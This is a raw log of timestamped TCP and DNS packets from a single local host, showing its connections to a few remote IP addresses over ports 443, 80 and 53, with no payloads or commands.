Jan 14, 2025 08:08:15.390045881 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.390441895 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.390501976 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.391035080 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.391097069 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.392138958 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.392199039 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.392229080 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.392290115 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.606945038 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.606961966 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.607019901 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.607043982 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.607109070 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.607287884 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.607343912 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.607559919 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.607616901 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.607933044 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.607991934 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.608481884 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.608545065 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.608594894 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.608670950 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.609148026 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.609208107 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.609239101 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.609304905 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.611898899 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.611960888 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.611998081 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.612070084 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.612673998 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.612745047 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.613081932 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.613142967 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.693207979 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.693305016 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.693305016 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.693336010 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.693367958 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.693387985 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.824662924 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.824743032 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.824836969 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.824898958 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.824955940 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.825017929 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.825181007 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.825241089 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.825524092 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.825587034 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.825639009 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.825716019 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.825751066 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.825803995 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.825993061 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.826045036 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.826273918 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.826354980 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.826369047 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.826422930 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.826575041 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.826636076 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.826730967 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.826790094 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.826982021 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.827044010 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.827092886 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.827164888 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.827203989 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.827267885 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.827424049 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.827483892 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.911581039 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.911650896 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.911715031 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.911767960 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.911828995 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.911876917 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.911952972 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.912012100 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.912066936 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.912128925 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.912190914 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.912249088 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.912292004 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.912348986 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.912733078 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.912790060 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.912956953 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.913009882 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.913060904 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.913119078 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.913182020 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.913238049 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.913265944 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.913320065 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:15.913435936 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:15.913495064 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.042515039 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.042598963 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.042681932 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.042745113 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.042803049 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.042862892 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.042905092 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.042965889 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.043036938 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.043093920 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.043139935 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.043203115 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.043442011 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.043531895 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.043654919 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.043735027 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.043781996 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.043844938 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.044217110 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.044282913 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.044334888 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.044399023 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.044442892 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.044496059 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.044528008 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.044589043 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.044852018 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.044914007 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.045066118 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.045130968 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.045172930 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.045234919 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.045257092 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.045320034 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.128839970 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.128905058 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.128916025 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.128926992 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.128957033 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.128973961 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.129023075 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.129071951 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.129185915 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.129230976 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.129543066 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.129614115 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.129739046 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.129791021 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.129878998 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.129931927 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.130299091 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.130367041 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.130400896 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.130446911 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.130707979 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.130770922 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.130820036 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.130871058 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.130956888 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.131020069 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.131094933 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.131145954 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.131207943 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.131270885 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.131340981 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.131398916 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.131480932 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.131531954 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.260179996 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.260261059 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.260315895 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.260386944 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.260690928 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.260752916 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.260781050 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.260840893 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.261063099 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.261126041 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.261187077 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.261248112 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.261322021 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.261372089 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.261460066 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.261517048 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.261555910 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.261610985 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.261620998 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.261656046 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.261710882 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.261754036 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.261972904 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.261989117 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:16.261997938 CET	49742	443	192.168.2.4	166.62.27.188
Jan 14, 2025 08:08:16.262001991 CET	443	49742	166.62.27.188	192.168.2.4
Jan 14, 2025 08:08:22.190680027 CET	49754	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:22.195666075 CET	80	49754	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:22.195754051 CET	49754	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:22.196283102 CET	49754	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:22.201098919 CET	80	49754	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:23.021819115 CET	80	49754	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:23.025568008 CET	49754	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:23.030510902 CET	80	49754	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:23.304986000 CET	80	49754	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:23.466368914 CET	49754	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:23.765882969 CET	49757	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:23.765916109 CET	443	49757	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:23.766660929 CET	49757	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:23.782708883 CET	49757	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:23.782728910 CET	443	49757	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:24.252933025 CET	443	49757	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:24.253015041 CET	49757	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:24.260711908 CET	49757	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:24.260730982 CET	443	49757	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:24.261198997 CET	443	49757	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:24.466321945 CET	49757	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:24.518202066 CET	49757	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:24.559338093 CET	443	49757	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:24.628225088 CET	443	49757	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:24.628335953 CET	443	49757	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:24.628386021 CET	49757	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:24.642575026 CET	49757	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:24.650568962 CET	49754	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:24.655550003 CET	80	49754	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:24.938235044 CET	80	49754	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:24.940628052 CET	49758	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:24.940721035 CET	443	49758	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:24.940825939 CET	49758	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:24.941328049 CET	49758	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:24.941410065 CET	443	49758	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:25.098612070 CET	49754	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:25.427249908 CET	443	49758	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:25.430160999 CET	49758	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:25.430260897 CET	443	49758	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:25.505357027 CET	52741	53	192.168.2.4	1.1.1.1
Jan 14, 2025 08:08:25.510242939 CET	53	52741	1.1.1.1	192.168.2.4
Jan 14, 2025 08:08:25.510468006 CET	52741	53	192.168.2.4	1.1.1.1
Jan 14, 2025 08:08:25.510468006 CET	52741	53	192.168.2.4	1.1.1.1
Jan 14, 2025 08:08:25.515332937 CET	53	52741	1.1.1.1	192.168.2.4
Jan 14, 2025 08:08:25.580059052 CET	443	49758	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:25.580214024 CET	443	49758	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:25.580410004 CET	49758	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:25.580540895 CET	49758	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:25.584059000 CET	49754	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:25.585232973 CET	52742	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:25.589092970 CET	80	49754	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:25.589148998 CET	49754	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:25.590087891 CET	80	52742	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:25.590145111 CET	52742	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:25.590271950 CET	52742	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:25.595031023 CET	80	52742	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:25.964489937 CET	53	52741	1.1.1.1	192.168.2.4
Jan 14, 2025 08:08:25.965481997 CET	52741	53	192.168.2.4	1.1.1.1
Jan 14, 2025 08:08:25.970608950 CET	53	52741	1.1.1.1	192.168.2.4
Jan 14, 2025 08:08:25.970717907 CET	52741	53	192.168.2.4	1.1.1.1
Jan 14, 2025 08:08:26.410264969 CET	80	52742	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:26.412103891 CET	52744	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:26.412205935 CET	443	52744	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:26.412303925 CET	52744	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:26.412631035 CET	52744	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:26.412667036 CET	443	52744	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:26.450742006 CET	52742	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:27.782176971 CET	443	52744	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:27.783858061 CET	52744	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:27.783947945 CET	443	52744	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:27.927634001 CET	443	52744	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:27.927675962 CET	443	52744	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:27.927762032 CET	52744	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:27.928102970 CET	52744	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:27.932231903 CET	52745	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:27.937093019 CET	80	52745	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:27.937180996 CET	52745	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:27.937289953 CET	52745	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:27.942091942 CET	80	52745	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:28.842770100 CET	80	52745	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:28.861211061 CET	52746	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:28.861314058 CET	443	52746	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:28.861418009 CET	52746	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:28.861838102 CET	52746	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:28.861921072 CET	443	52746	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:28.888226032 CET	52745	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:29.330133915 CET	443	52746	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:29.331756115 CET	52746	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:29.331841946 CET	443	52746	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:29.469213963 CET	443	52746	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:29.469377041 CET	443	52746	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:29.469518900 CET	52746	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:29.474735975 CET	52746	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:29.477653980 CET	52745	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:29.478668928 CET	52747	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:29.482853889 CET	80	52745	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:29.482956886 CET	52745	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:29.483511925 CET	80	52747	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:29.483582973 CET	52747	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:29.483717918 CET	52747	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:29.488512993 CET	80	52747	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:30.320014954 CET	80	52747	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:30.326232910 CET	52748	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:30.326277971 CET	443	52748	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:30.327343941 CET	52748	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:30.327697039 CET	52748	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:30.327708960 CET	443	52748	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:30.372611046 CET	52747	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:30.788410902 CET	443	52748	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:30.789880991 CET	52748	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:30.789901018 CET	443	52748	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:30.931499958 CET	443	52748	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:30.931658030 CET	443	52748	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:30.931710958 CET	52748	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:30.936647892 CET	52748	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:30.943155050 CET	52747	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:30.948414087 CET	80	52747	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:30.948456049 CET	52749	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:30.948488951 CET	52747	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:30.953396082 CET	80	52749	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:30.953634977 CET	52749	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:30.953635931 CET	52749	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:30.960494995 CET	80	52749	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:31.802824020 CET	80	52749	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:31.808937073 CET	52750	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:31.808973074 CET	443	52750	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:31.809076071 CET	52750	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:31.809484005 CET	52750	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:31.809510946 CET	443	52750	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:31.847755909 CET	52749	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:32.290600061 CET	443	52750	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:32.292741060 CET	52750	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:32.292768955 CET	443	52750	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:32.440965891 CET	443	52750	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:32.441087008 CET	443	52750	104.21.16.1	192.168.2.4
Jan 14, 2025 08:08:32.441379070 CET	52750	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:32.442011118 CET	52750	443	192.168.2.4	104.21.16.1
Jan 14, 2025 08:08:32.485138893 CET	52749	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:32.485938072 CET	52751	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:32.490313053 CET	80	52749	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:32.490380049 CET	52749	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:32.490725040 CET	80	52751	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:32.490813017 CET	52751	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:32.490906000 CET	52751	80	192.168.2.4	132.226.8.169
Jan 14, 2025 08:08:32.495728970 CET	80	52751	132.226.8.169	192.168.2.4
Jan 14, 2025 08:08:33.319438934 CET	80	52751	132.226.8.169	192.168.2.4
